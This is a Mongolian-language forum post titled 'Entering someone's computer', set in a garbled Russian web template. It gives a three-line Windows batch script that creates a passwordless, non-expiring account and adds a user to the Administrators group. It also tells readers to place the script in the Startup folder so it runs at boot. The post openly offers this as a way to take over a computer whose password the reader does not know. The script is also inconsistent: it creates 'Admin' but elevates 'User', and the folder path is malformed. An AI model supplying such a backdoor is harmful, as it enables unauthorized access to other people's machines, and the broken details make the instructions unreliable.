Нүүр хуудас | | | Бүртгүүлэе
×òåíèå RSS
Ñóïåðñàéò
Ñóïåðñàéò
Ãëàâíàÿ Êîíòàêòû Êàðòà ñàéòà Äîáàâèòü â èçáðàííîå
 • Ìåñòî ïîä ðåêëàìó

  Îïðîñ ïîëüçîâàòåëåé

  Rate my site

  • Ïàðòíåðû

  • Нийт online: 1
   Зочин: 1
   Гишүүд: 0

   Ïîïóëÿðíîå

   »
   S

  Ðåêîìåíäóåì

  • {topnews}
 • Нийтэлсэн: =CyBeR= Хэзээ: 2023-12-06 Цааш уншсан: 949

  Хүний компьютерт нэвтрэх

  Пассыг нь мэдкү комьпютер дээр сууж байгаад пассгүй болгомоор байвал дараах нийтлэлийг уншаарай.

  Notepad програм нээж байгаад доорх жижигхээн текстийг бичээд user.bat гэж хадгалаарай.

  @echo off
  net user Admin /add /expires:never /passwordreq:no
  net localgroup "Administrators" /add User

  Тэгээд user.bat файлаа StartUp руу хуулчих. Энэхүү StartUp -д  (C:Documents and Settings/All Users/Start Menu/Programs/Startup) компьютер асаад шууд ажиллуулдаг програмууд байралдаг юм. Одоо энэ компьютерт User нэртэй нууц үггүй Administrator эрхтэй болж байна гэсэн үг.

  Та бүртгүүлж байж илүү давуу эрх эдэлнэ

   {related-news}


  èåâ-->

  Сэтгэгдэл бичэх хэсэг

  Нэр:
  E-Mail хаяг:

Íàâåðõ

Ðåêëàìà

Æóðíàë äëÿ ìîëîäåæè
Designed by CENTROARTS
Free web hostinguCoz -->